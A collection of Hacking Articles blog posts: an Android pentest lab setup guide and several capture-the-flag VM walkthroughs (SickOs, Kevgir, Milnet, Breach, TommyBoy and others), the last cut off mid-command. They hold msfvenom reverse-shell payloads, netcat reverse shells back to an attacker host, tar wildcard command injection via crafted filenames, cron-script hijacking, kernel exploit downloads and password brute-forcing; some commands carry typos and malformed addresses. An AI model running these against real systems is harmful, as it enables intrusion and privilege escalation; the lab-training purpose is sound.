Let’s start…

So first download Santoku OS from here. Santoku OS is built especially for Mobile penetration testing and forensic investigation. Santoku comes with pre-installed SDKs and other utilities. There is a bunch of forensic tools also like firmware flashing tools for multiple vendors, some other forensic scripts for enumerating app details, etc.

After downloading Santoku open Virtual Box and create a new virtual machine for it.

Now select RAM for Santoku VM, recommended is 786MB but I took 2GB, you can select according to your own need and click NEXT.

In this section select hard disk type as per your need or select VMDK (Virtual Machine Disk)

Here select the size of the hard disk as you wish and then create VM.

Now for installing Santoku tou our created VM right click on Santoku VM and go to settings Storage then select the empty disk after click on disk icon just in front of optical drive in the attribute section and then browse and select the downloaded santoku iso file and click Okay.

Finally launch that VM and after few seconds santoku boot menu will appear select “Install- start th installer directly”

Now installation process will begin, select your preferred language then click on continue after click on Install now.

Select your preferred language for the keyboard.

Now in this section name your VM and set a strong password for login access you can also chose Login automatically but it’s not a good choice.

Now santoku will start copying files and installing. Now sit back and wait for few minutes after that it will restart.

Here our Santoku is installed that means our first part is completed.

Now you can download Genymotion from here .

Basically, Genymotion is a relatively fast Android emulator which comes with pre-configured Android with OpenGL hardware acceleration suitable for application testing.

After installing Genymotion, go to https://www.genymotion.com/account/create/  and create a free account there and verify your email ID. Then come back to genymotion desktop software and login there using newly created account credentials.

Now to create an AVD click on ‘Add’ a new menu will appear where you can select android devices according to device brands and version numbers.

Select the device according to your need and click next. Then in this sections your review the configuration of android mobile device and finally create virtual device.

Now the device will start download the data and deploy the virtual android device.

Here you can see I created 2 virtual devices. Now select the devices and launch it.

Here is our Android Virtual Device.

To test our application for any kind of vulnerability we need Android SDK because in our testing phase we will be going to use ADB (Android Debugger Bridge) command line almost every time.  And Android SDK is preinstalled in Santoku OS. So, now we are going to connect santoku to our Android Virtual Device.

Fists check the IP of Android Virtual Device.

Now open command line in Santoku and type:

adb connect <IP of Android Virtual Device>

You can check whether device is connected or not by typing:

adb devices

So here we can see that list is showing that 1 device connected.

And here you can also run shell to enter in android mobile by typing:

adb shell

 So here creating penetration testing lab for android application is completed now stay tuned for next article on actual android app penetration testing and hacking.

Author: Akshay Bhardwaj is a passionate Ethical Hacker, Information Security Researcher and Technical Writer currently working at Provensec LLC as a Security Researcher.. You can follow him on LinkedIn and Twitter.

The post Build an Android Penetration Testing lab appeared first on Hacking Articles.

In this walk through I will explain how to solve the SickOs 1.2 challenge. This OS is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment.

First Download Sick OS from Here

So, first let us find our target by using :

netdiscover

Our target is 192.168.1.105 Further we will apply nmap scan :

nmap -A -p- 192.168.1.105

As you can see that port 80 is open that means we can open this IP in the browser. Why not do that?

Opening the IP in the browser will show us the above image which is of no use. You can try and look into the page source but unfortunately you will find nothing there. That is why we will use dirb and to find the directories. And for that type :

dirb http://192.168.1.105

As a result you can see we have found our directory i.e. test Open it in the browser as well.

192.168.1.105/test/

It will show you the list of directories. So let us try and explore test directory via curl.

curl -v -X OPTIONS http://192.168.1.105/test

This exploring will show you that PUT is allowed that means you can upload through it.

So, prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.113 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension.

Now to upload your .php file we will use the add-on poster.

Click on the tools from the menu bar. And then click on Poster from the drop down menu.

A following dialog box will open. Here, browse the file that you will upload and click on PUT option.

It will show you that the file is uploaded.

And you can see the same on your browser that you file will be uploaded (as in our case the file is shell.php)

Simultaneously, open metasploit and use multi/handler :

use multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

After hitting enter button on your keyboard, run the file you just uploaded. It will give you a meterpreter session. Go to shell typing :

shell

Now we need to import the python file to reach the terminal and to do so type :

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Now there might the kernel version that we could exploit so to check its version type ;

lsb_release -a

As you can see that version is not exploitable so we will leave it alone.

Moving further type the following to explore more and find something to be exploitable :

ls -l /etc/cron.daily

The above command will give you the list of the files. On observing you can see that there is chkrootkit. Some of its version are exploitable therefore we will check its version and for that type :

chkrootkit -V

It will show you the version which is 0.49

We will now search for its exploit in the terminal of Kali by typing :

searchsploit chkrootkit

Hence, the exploits.

Now open metasploit and check the already opened session first and then look for the exploit by typing :

search chkrootkit

And the exploit which you have to use will appear. And to use this exploit type :

Then further type options so that you will know what options you are supposed to set. Checking the options you know you only need to assign he session and lport so type :

use exploit/unix/local/chkrootkit

set session 1

set lport 8080

exploit

Now check whether you have gained another session or not and for that type :

sessions

And as you can see you will surely have one more session and so to open that session type :

sessions -i 2

As you open the session check what user you are in and for that type :

whoami

It will show you that you are in root so further type :

cd /root

And to see the list of files in /root type :

ls -lsa

In the list you will see that there is a text file and to read that file type :

cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the SickOS 2.1 VM (CTF Challenge) appeared first on Hacking Articles.

Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal. Therefore, in this article I will walk you through the whole method of completing this challenge.

First Download Simple VM from here

We start by identifying our target with the following command :

netdiscover

Our target is 192.168.0.104

Then move on to scanning our target with nmap : nmap -A -p- 192.168.0.104

On scanning, you will find that port 80 is open. So we will now open it on our browser.

Now we can see that our target is using CuteNews v.2.0.3 and the good news is it is exploitable, so let’s search for its exploit :

searchsploit cutenews 2.0.3

Upon searching for the exploit we can see that we have the path for the exploit. Follow the path and go to the exploit’s “.txt” file. In the text file you find the instructions to upload the file. First thing it tells us to register on the website in order to have the power to upload a file. To register it will ask you to give your username and password. When you complete the steps of registering them it will redirect you to the following window :

Now we need to upload the file so make it with the help of msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension. To upload the file log in from the username with which you have just registered and then click on personal options give your username and mail ID and then browse the file that you want to upload and then click on save.

Now we will use dirb to find the directories. And for that type :

dirb hhtp://192.168.0.104

It will show you the uploads directory. This is the directory where your file will be uploaded. Open the directory in the browser and you find your uploaded file there.

Now go to metasploit and type :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter’s session. Further type:

shell

And if you type the combination of two following commands to import the python file to reach the terminal then it will not work as the version of python is updated :

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Now you will reach the terminal. Here, type the following command to know the version of kernel :

lsb release -a

As we know that version of the kernel is vulnerable, consequently we will download its exploit by the command as given below :
wget https//www.exploit-db.com/download/36746

This will install the exploit successfully. Moving forward, we will compile the file :

gcc 36746.c -o access -static

Now we will open the file access :

./access

Then type id to know the users and then type :

cd /root

and will take you into the /root. Further type :

ls

It will list the files and one of those files will be flag.txt. To read the flag type :

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Simple VM (CTF Challenge) appeared first on Hacking Articles.

In this article we will walkthrough a root2boot penetration testing challenge i.e Kevgir. Kevgir is a vulnerable framework, based on the concept of CTF(Capture The Flag).

Start off with finding the target using :

First Download Kevgir Vm From Here

netdiscover

Our target is 192.168.0.104 Now scan the target with nmap :

nmap -A -p- 192.168.0.104

With the nmap scan you can see the ports 80, 139, 2049, 6379, 8080, 8081, 9000, 40383 and many other are open as you can see in the image above and below :

Also, if you observe then you can see port forwarding is used here e.g. http service is open on port number 80, 8080 and 8081. So, let us try open our target on 80 and 8081 port.

On port 80 Our target opens as a the following :

And on port 8081 opens on :

The cms of the website is joomla and this version of joomla, as everyone knows, is exploitable. We will scan the said target with joomscan :

joomscan -u http://192.168.0.104:8081

Applying the joomscan will show all the vulnerable exploits. Now if you look closely the exploit number 15 will show you the steps to exploit the certain vulnerability. According to the said, go to 192.168.0.104:8081/index.php?optiona=com_user&view=reset&layout=confirm

When you go to the said url, it will ask you for the token.

Type an apostrophe (‘) in the token adjacent text box.

It will redirect you to a page where it will ask you to set up a new password.

After setting up the new password, login with the username and the password that you had just set.

Now that you are logged in, go to the Extensions menu and select Template Manager from the drop down menu.

Create the malicious code that you are going to upload via msfvenom.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

copy the code from >?php to die(); and when you have opened the template manager; choose the user Beez.

Paste the copied code there and click on save button.

Simultaneously, run multi/handler in metasploit by typing :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter’s session. Further type:

shell

And if you type the combination of two following commands to import the python file to reach the terminal then it will not work as the version of python is updated :

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Now you will reach the terminal. Here, type the following command to know the version of kernel :

lsb release -a

And now look for the writtable file by typing :

find / -writable -type d 2>/dev/null

Now this was our routine method to complete any CTF challenge but in this case it will not work as we tried to download the exploit but it didn’t dared to happen so we tried to exploit it through SSH which is working on the port number 1322 as the nmap scan suggests

For this just to the terminal of Kali and type :

ssh admin@192.11618.0.104 -p 1322

To obtain this password of SSH you need to apply brute force attack and the username and password that you wil get is admin:admin respectively.

Now you have logged in through the admin user. Here, download the exploit in the /tmp file.

wget https://www.exploit-db.com/exploits/39166

As the exploit is downloads itself successfully, you will then need to compile it and for that type :

gcc 39166.c -o privs

Then give the permission to the privs by typing :

chmod 777 privs

and then run it :

./privs

And so you have reached root. Congrats!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Kevgir VM (CTF Challenge) appeared first on Hacking Articles.

This is a boot2root challenge which we will try to complete. This VM is created by Warrior and is a basic exploitable VM so we do not need to worry about any advance exploits and reverse engineering.

Download the VM from –> https://www.vulnhub.com/entry/milnet-1,148/

As always start off by locating the target with the following command:

netdiscover

Our target is 192.168.0.105. Now we will scan our target with nmap to know all about its ports.

nmap  -A -p- 192.168.0.105

To know more about our target we will use nikto.

nikto -h 192.168.0.105

As you can see we did not acquire much information from nikto so let us open it on our browser, maybe we can find something from there.

Looking into the page source and all the tabs on the left side we could not find anything. So we explored and searched allot and we found remote file inclusion vulnerability. Upon finding the said vulnerability our step was clear i.e. we had use Tamper data.

So go to Tools on menu bar and select Tamper data

When the Tamper Data opens click on Start Tamper.

Then click on main button, a dialog box will open and from this dialog box click on Tamper.

Now generate the php code with the help of which we will have our meterpreter session and to generate the code type:

msfvenom php/meterpreter/reverse_tcp lhost=192.1680.103 lport=4444 -f raw

Copy the code from <?php to die() and save it on the file with extension .php. After the file is saved, transfer the file to var/www/html

Then on Tamper Data give the path of the file without the extension in the text box adjacent to route. For example type:

http://192.168.0.103/evil?

Before clicking on OK run metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.103

set lport 4444

exploit

And when you click on ok you will have your meterpreter session. You can type the following command to get the information of the system:

sysinfo

Then you type the set of following commands to reach the terminal:

shell

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Now that we are in the terminal, we wil look for the version of kernel to know wheather its vulnerbale or not and ofr that type:

lsb_release -a

As you can see, kernel’s version is not exploitable. So we searched and looked for any other option which could help us gain root’s access. And so we looked in to the /passwd with the following command

cat /etc/passwd

This file will show the name of user langman and we switched our user to langman. So we checked the user on home by typing:

cd home

ls

And then we switched:

cd langman

Then check the list of thing present in langman by typing :

ls

There is only one folder available so let’s go into it.

cd SDINET

ls(to check the contents of SDINET)

Here, in SDINET you will find a text file which will show you all the steps to move ahead. It contains unix wildcard attacks.

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

Some further digging revealed that crontab was running a backup script as root, which used tar to compress the contents of /var/www/html. One of the attacks mentioned in the text document covered tar. The commands we used are:

cat /etc/crontab

cat /backup/backup.sh

Now we will open an additional listener for our attack. And for that open the terminal of Kali on the side and type:

nc -lvp 443

This will help us to achieve arbitrary command execution stemming from the tar command within the backup.sh script.

Next we ran the following commands:

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.0.103 443 >/tmp/f” > shell.sh

touch “/var/www/html/–checkpoint-action=exec=sh shell.sh”

touch “/var/www/html/–checkpoint=1”

The above commands help the tar command to run the file, shell.sh after the first file is archived. Since the backup.sh script is running as root, this has the effect of spawning a netcat shell and sending it to the attack platform on port 443.

And if you go back to the terminal window where the listener was on.

And BAM!! The Flag is captured!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Milnet VM (CTF Challenge) appeared first on Hacking Articles.

SkyDog is a Capture the Flag VM with six flags. Capturing these flags is quite fun and interesting. Before starting off i am listing the following hints that we know of beforehand:

Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words)

Flag #2 When do Androids Learn to Walk?

Flag #3 Who Can You Trust?

Flag #4 Who Doesn’t Love a Good Cocktail Party?

Flag #5 another Day at the Office

Flag #6 Little Black Box

Now that we have payed attention to all of the hints, let us start by discovering our target.

netdiscover

Our target is 192.168.1.114. Scan the target with nmap.

nmap -A -p- 192.168.1.114

As the result we can see that port 22 and 80 are open. Therefore, open the IP in the browser. And as you can see there is nothing but the image of CTF in the webpage.

Download the image and read it with exiftool.

exittool SkyDogCon_CTF.jpg

Download the image and read it with exiftool.

exittool SkyDogCon_CTF.jpg

Reading the image we will find the flag 1.  The first flag is in MD5 hash value and we will crack the hash value with online MD5 cracker i.e. crackstation.net

The value will make up to the word welcome home. So till now we know that FLag #1 is welcome Home. Now, onto the next flag. But before that let’s explore more through nikto.

nikto -h 192.168.1.114

With help of nikto we found a robots.txt file. And yes! Opening it in the browser we found our next flag. So crack the MD5 value of the flag with crackstation.net. 

On cracking the value of Flag #2 is Bots

After cracking the flag #2 we explored robots.txt some more and upon opening all the allow directories one by one there was one which opened i.e. /Setec

On opening the page source of /Setec you will find an Astronomy directory.

Now open this directory by typing: 192.168.1.114/Setec/Astronomy

Here, you will find whistler.zip. Download the file and and apply dictionary attack to find its password with the help of rockyou.txt and for that type:

fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktopwhistler.zip

And you will find the password i.e. yourmother and now of course unzip the file:

unzip whistler.zip

Afterunzipping you will find Flag #3 and some other file with a hint. First open flag:

cat flag.txt

You will have your flag again in MD5 value. Crack it with similar method.

On cracking the MD5 value you will get flag i.e. yourmother.

Now open the other file:

cat QuesttoFindCosmo.txt

This file will give you a hint regarding OSINT.

OSINT: Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources); it is not related to open-source software or public intelligence.

That means we have to find something related to OSINT. If you recall there was a similar thing in the movie Sneakers and so we will use the movie and apply the technique of cewl here. CEWL lets us create a dictionary file using a URL and here we will use the URL of the movie to help us create the dictionary file and therefore type:

cewl –depth 1 http://www.imdb.com/tittle/tt0105435/trivia?ref_=tt_ql_2 -w /root/Desktop/sneakers.txt.

Now we will use this sneakers.txt file to find a directory.

dirb http://192.168.1.114 /root/Desktop/sneakers.txt

This command will show us the following directories:

• PlayTronics
• Sectec
• Astronomy

We have already seen the content of Setec and Astronomy directories and so we will now explore PlayTronics.

And to our luck we found Flag #4 in the PlayTronics directory. Crack the flag with similar method and you will have the Flag #4 vlaue i.e. leroybrown

In PlayTronics we also found a file with .pcap extension. Open that file with wireshark. And upon studying its data carefully you will find an audio file. Download audio file.

Upon playing the file you will find it says only one word i.e. werner brandes. Now this “werner brandes” word can be our user name. So make a text file with possible combinations of username using the word “werner brandes”. Also, make a text file for passwords containing all the flag values that we just found.

Now that you have possible usernames and password then apply dictionary attack on SSH to find the correct username and password. And for open metasploit and type:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.114

set rport 22

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass/txt

And you have you username: password i.e. wernerbrandes:leroybrown respectively. Now that you have username and password log in with SSH

ssh wernerbrandes@192.168.1.114

(Password = leroybrown)

And fortunately we also found Flag #5 in MD5 value. Crack it with same method and the will turn up to be Dr. Gunter Janek

Now let’s find a writable file and for that type:

find / -writable -type f

If you observe you will see that /lib/log/sanitizer.py has the most permissions.

So we will open the sanitizer.py file with the following steps:

cd /lib

cd log

nano sanitizer.py

On opening the sanitizer.py, the following file will open and in the file change the path in brackets to:

(‘chmod u+s /bin/sh’)

By changing this path we are giving maximum permissions to /bin/sh.  So now go to /bin/sh with following steps:

cd ..

cd ..

/bin/sh

Use the following commands to know you id :

id

whoami

Then go to the /root.

cd /root

See the list of files:

ls

There is only one folder so let’s see what it has to offer.

cd BlackBox

ls -lsa

Again you will find the blackbox folder. Open it.

cd Balckbox

ls -lsa

And finally you will have you last flag :

cat flag.txt

Crack the value of flag with the same method.

HURRAYYY!!! All the six flags have been captures. And this CTF is completed.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the SkyDog VM (CTF Challenge) appeared first on Hacking Articles.

This time we are going to solve a fun VM i.e. Breach 1.0. Let’s find out what we already know about it:

Breach 1.0 is a first VM in a multi-part series, it is meant to be for beginner to intermediate boot2root/CTF challenge. It is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet.

nmap -Pn 192.168.110.140

As you can see it has almost all the ports open that could only mean one thing i.e. an IDS is activated.

Now let’s start nikto :

nikto -h 192.168.110.140

Nikto proved to be useless in this case. So now let’s divert our attention to Port 80 which is most known and open so we will try by investigating the said port and do to so open the target IP into your browser.

On the home page you will find an image with some dialogues/comments. Open the page source and you will find a base64 encoded code:

<! ——Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo —–>

Decode this code using a Add-On HackBar for Mozilla. Enable this Add-on and click on its Encoding tab then select Decode option. After this it will ask you for the string that you want to decode. Paste the code there and click on Ok

It will show the Base64 code again which means that the code has been encoded twice.

Further decode it with the similar method and you will have one username and password.

Now go back to the home page and click on the image. It will redirect you to another page.

We tried and open every tab but found nothing except the Employee Portal tab. clicking on Employ Portal tab will open a log in page. Log into it by username and password that you have just decoded using Hack Bar.

Once you are logged in, you will we that there are three messages in the inbox. Open each message one by one as we may find a clue in it.

In the first mail a user is simply sending a message to another user named peter. And as we found no clue in it we may move forward to the second mail.

Second mail is about IDS which confirms our suspicion about activated IDS.

Moving onto the third mail you will find that there is a URL mentioned and they are talking about a SSL certification. So let’s not wait any longer and open the URL first.

Opening the URL it will show a file to download. Download the file and save it.

Now let’s look for SSL in the search bar and see what it has to offer.

There is in fact an SSL certification present. Open it

In the SSL certificate you will find a URL.

Similarly, open the URL and it will ask you to download a file.

Once you have downloaded the file. Open it with wireshark

Now that the file is opened, try to read it by right clicking on the file and then selecting follow >> TCP stream. This is a normal method to read it but as you can see via this method you can’t read the file as its encrypted and from earlier we know that SSL certificate will allow us to read it.

But now the problem is that SSL option is not activated. So now we have to find a way to activate it. Let’s have look on the files that wireshark is providing. You can see that the most communication is taken place on the port 8443. This port is used for tomcat and the file we downloaded earlier, namely .keystore, might had all the certificates because we recall while downloading this keystore file mentioned something about tom cat which means our intuition is correct.

Now doing a lot of research on internet on security stack we found the keystore’s proprietary format (called “JKS”) to standardized format PKCS12.

keytool -importkeystore -srckeystore keystore -destkeystore mykeystore.p12 -deststoretype PKCS12 -srcalias tomcat

In passwords we have put tomcat as it the general default password. Now the file is ready to import.

 So, now to activate it simply go to Edit menu from the menu bar and select Preferences from the drop down menu.

A dialog box will open, select protocols option and then select SSL and then click on Edit button.

Another dialog box will open. Here, give IP address of the target and port number 8443 along with the path of keystore file and the password.

Now we have activated SSL so right click on the file and choose the option Follow and then select SSL stream.

Finally, now you can read the file. In the file you will again find a base64 code. Decode it in the similar way using hack bar.

Decoding it with the Hackbar will give you the username and password as the result.

Traversing the file on wireshark some more will show you and URL as shown:

Opening this URL on the browser will open a software foundation page made in java. On this page you can find a browse option which means we can upload a malicious file here.

So now let’s generate a mile through msfvenom which is compatible with java and for this type :

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > /root/Desktop/update.war

Go to the browse option now and upload your file.

The file is uploaded.

Now before clicking on the file open metasaploit and type ;

 use exploit/multi/handler

set payload java/meterpreter/rever_tcp

set lhost 192.168.110.128

set lport 4444

exploit

 Click the file once you hit enter and you will have you meterpreter’s session in no time.

Now go to the shell and import the python file to have the control of terminal and for that type :

shell

 echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

 python /tmp/asdf.py

 Once you reach the terminal type the following command to see the details:

ls -lsa

As we found nothing in it we went back by typing :

cd ..

Then go to home and into the Milton and read the file which may have our flag. Do this with the following steps:

cd home

 ls -lsa

 cd milton

 ls -lsa

 cat some_script.sh

LOL! We are trolled as there was no flag here. Now that we found nothing here we were back to square one which means we then started search everything again thoroughly. And then we found an image called bill.png.  

We read it with exiftool by typing:

exiftool bill.png

We found a password here i.e. coffeestains

Then go to the passwd file :

cat /etc/passwd

 Then su and give the password as coffeestains :

su blumbergh

 And then look for the ID’s by typing :

id

On further exploring you will find a file called /usr/share/cleanup/tidyup.sh.  It says in this file that it runs every three minutes in order to defend itself from hackers. So now, as we have root’s access we should be able to modify it and so type:

echo “nc -e /bin/bash 192.168.110.128 8443” > shell.txt

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

cat /usr/bin/tee /usr/share/cleanup/tidyup.sh

As they above commands have been executed, we will now need a listener to read our flag and for that type ;

nc -lvv -p 8443

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Breach 1.0 VM (CTF Challenge) appeared first on Hacking Articles.

Tommy Boy VM is a CTF based on the movie Tommy Boy and the fictitious company “Callahan Auto” in the movie. This CTF, Tommy Boy, has been created by Brian Johnson of 7 Minute Security. It is a really fun VM — a few bits of it were fairly easy, some parts of it were really tricky, and there are some pretty neat little tricks in there too.

WalkThrough

Start off with scanning the network to find our target. And we all the command for it is :

netdiscover

We found our target –> 192.168.0.102

Our next step is to scan our target with nmap. We will apply aggressive scan as it is quick.

nmap -A 192.168.0.102

Result shows us that there are 3 ports ope : 22(ssh), 80(http), 8008(http).

Moving on we will use nikto to have detailed information of our target. So for this, type :

nikto -h 192.168.0.102

By using the nikto command we found out that there is a text file with the name of robots.txt which might contain some information. We wanted to have look in it so we opened it up on our browser. And yes, we found our first flag.

Opening the first flag, we found out that there are total of five flags whose combination will open the treasure in our scavenger hunt. Also, of course, we found the first flag i.e. part one of five of a password.

To further explore and find rest of the flags we browsed to port 80 and we greeted with the Callahan Auto page which apparently was experiencing some technical difficulties.

Now, as we were stuck there, we thought about using the curl command. As we all know it provides us with a library and command-line tool for transferring data using various protocols along with so much of detailed information which can we used on various occasions. To use curl type :

curl http://192.168.0.102

Executing the curl command we found a youtube link. No harm in opening it so let us do that.

Opening the youtube link, we know that it has to do something with prehistoric forest. So we decided to use it on the browser as –> 192.168.0.102/prehistoricforext/

And to our luck we found alot of information. First of our information was that the website was made in WordPress.

Knowing the website was made in WordPress, automatically had us use WPScan. And to use it open WPScan in the terminal of Kali and type :

wpscan –url http://192.168.0.102/prehistoricforest –enumerate user

Applying WPScan proved itself useful and we found that there are indeed four users. This information came in handy later.

Further investigating the same “prehistoricforest” page we found other important things like the text file which contained our second flag.

As we opened the text file we had our second flag. Two down, three more to go.

As we found another important clue on the same web page of prehistoric forest we decided to investigate further. And this decision proved right as we found another clue which stated to use /richard instead of /prehistoricforest.

And we did as stated above and we stumbled upon an image.

This image, being as it is, gave us no clue. So we decided to open it with exif. There was no need to use third party software as exif readers was available online. Click on browse option to give the Image.

Investigating the image we find an MD5 hash value.

Go to www.md5cracker.org and crack the md5 code we just discovered. On cracking it we will find that it makes up the word spanky.

Now this spanky word can we our password so if we open the URL : 192.168.0.102/prehistoricforest/ and open one of the comments then it will ask you for the password. So, give the password as spanky.

It will open a page with some hints. Reading it there are only to things to remember :

• There is something about nickburns
• There is an FTP port open.

Now, we scanned before and we did not find a FTP port anywhere. So let us scan port by port. And for that type :

nmap -p 1-655535 192.168.0.102

Applying the above scan we can see that there is a port 65534 opened. Now this might be the port where FTP service might have been forwarded too. So, now exploit this port using WinSCP.

Open the WinScp software, givethe target’s IP ans the port number along with the username : nickburns and password : spanky

Import the file readme.txt .

Opening the file you will come across the following :

In the file you will see that he is talking about a subfolder “NickizL33t“

Furthermore, we will find the following page :

Now if you pay attention and use common sense you will see that it says “only me and Steve Jobs are allowed to look at this stuff” that means we can read it with i-phone. Now, its obvious that every one of us do not have i-phone so don’t get upset we have substitute for it.

There is Add-on for Mozilla named “User Agent Switcher” which will allow you read the said file.

When you have added this Add-on. Go to the Tools menu. A drop down menu will appear select Default User Agent and from its select iphone 3.0 option.

After doing the said, the page will appear somewhat like the following :

Now he is talking about some .html file. As we have already checked everywhere and didn’t find such file. It’s a possibility that this file was hidden so let’s use DIRBuster to find it.

Open DirBuster, give target’s IP and the path of dictionary file named rockyou.txt

Also, select iphone in Http User Agent

It will show you that there a fallon1.html  hidden file. Upon opening it you will have :

• A hint
• Third flag
• Big Tom’s encrypted pw backups

In hint.txt you will find hints all about the passwords.

And of course in the flag file you will find the third flag i.e. third part of the password with five parts.

Third file will be the one which you will download.

We got all the hints about password we needed. Therefore, we will generate a dictionary file using crunch and for this type :

crunch 13 13 -t bev,%%@@1995 -o /root/Desktop/dict.txt

And then we will crack the password of the zip file we just downloaded using fcrackzip and so type :

fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip

Opening the zip file we have all three usernames and password but one.

Now to have the password for the forth user we will use wpscan :

ruby ./scan.rb –url https://192.168.0.102/prehistoricforest –wordlist /usr/share/wordlists/rockyou.txt –username tom

After about 3 to 4 hours you will have ether password i.e. tomtom1

Now we logged in to the admin page but we did not find anything here except for the fact that there is something on SSH port.

So now, we will try to log in with SSH port.

ssh bigtommysenior@192.168.0.102

To see the list of files and folders type :

ls -lsa

As you can see we have achieved the flag four i.e. part four of five of password read the flag :

cat el-flag-numero-quatro.txt

except the flag we have also found the backup file. Copy it so that we can open the home page propery in the browser :

cp callanhanbak.bak /var/www/html/index.html

Now open the it in Browser.

Look up into the page source :

Here you will find a note directing you towards the a folder. Let’s see what it has :

It is the page where you can upload the file. So create the code via msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=444 -f raw

Copy the code from <?php till die();  and save it to a .php file. If it does not uploads your php file you must change its extension to PNG or JPG or GIF to upload it. While you upload the filr start multi/handler before running it by going to metasploit and typing :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.0.106

exlpoit

 And then as you run your uploaded file you will have your meterpreter session. Then type Shell  to reach the shell of the VM.

Now to read the fifth flag the last part of the password type :

cat/.5.txt

And voila!! You have captured all of the five flags that make up to a password which will open the zip file.

So, now unzip the zip file :

unzip LOOT.zip

Once the file is unzipped it will contain the last part of the challenge i.e. a text file. Lets read it and finish this whole thing up :

cat THE-END.txt

HURRAYYY!!! We have Captured all the flags; hence completing the challenge.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post Hack the TommyBoy VM (CTF Challenge) appeared first on Hacking Articles.

Minotaur is a Boot2Root CTF challenge which helps us improve our skills especially of password cracking. The VM will assign itself a specific IP address (in the 192.168.56.0/24 range). Do not change this, as the CTF will not work properly without an IP address of 192.168.56. We know to think about it i.e.:

• One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
• This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.

You can download this VM from –> https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/

WalkThrough

We will start off by nmap because we already our target IP.

nmap -p- -A 192.168.56.223

As a result of nmap we can see that the port numbers: 22, 80, 2020 are open. We can use port 22 and 80 to our advantage.

Now we tried to explore through nikto and curl but unfortunately we found nothing of use. So we decided to use dirbuster.

Go to the terminal of kali and type :

dirbuster

It will open the dirbuster. In it, give the url in the Target URL box and select directory-list-2.3-medium.txt file in the File with list of dir box.

It will show you the directory called /bull/

Open the said directory in your browser.

It will show that there is a blog made in WordPress.  As the blog is in wordpress we can apply WPScan to find usernames and vulnerable themes and plung-ins. To apply WPScan type:

wpscan -u http://192.168.56.223/bull/ –enumerate u

The command will start executing and it will show you all the plug-ins that is exploitable along with usernames.

As you can see that there is only one user with the username bully. Also, there is plug-in exploit for Slideshow Gallery. But we will require username and password to make this exploit work. Now we already have username and all we need is its password and we have no idea where to find it as we have no dictionary or password file. Therefore we will make a password file using ceWL.

CeWL is a ruby app which traverses a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password cracking. To make a password file from CeWL go to your terminal of your kali and type:

cewl http://192.168.56.223/bull -m 3 -w /root/Desktop/pass.txt

This will create a .txt with list of all the words that have a possibility to be the password for the username bully.

Now to find which its password is we will use BurpSuite. So, apply dictionary attack using burpsuite and the moment it will find the correct password it will change it value of length as shown below:

Now that we know username and password we can use that exploit for the plug-in. And to do so open metasploit and type:

use exploit/unix/webapp/wp_slideshowgallery_upload

set rhost 19.168.56.223

